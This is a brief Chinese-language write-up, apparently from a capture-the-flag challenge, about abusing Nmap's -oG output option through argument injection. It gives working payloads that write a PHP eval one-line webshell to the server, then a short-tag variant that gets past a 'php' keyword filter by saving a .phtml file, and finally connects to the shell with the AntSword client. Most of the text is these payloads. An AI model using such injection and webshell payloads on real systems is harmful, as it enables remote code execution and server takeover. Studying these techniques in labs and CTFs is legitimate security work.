Nmap -oG 可以写入文件 因此我们可以写入一句话木马
payload如下
' <?php @eval($_POST["hack"]);?> -oG hack.php '
结果回显hacker php被过滤 因此考虑用短标签绕过
' <?= @eval($_POST["pd"]);?> -oG pd.phtml '
用蚁剑连接即可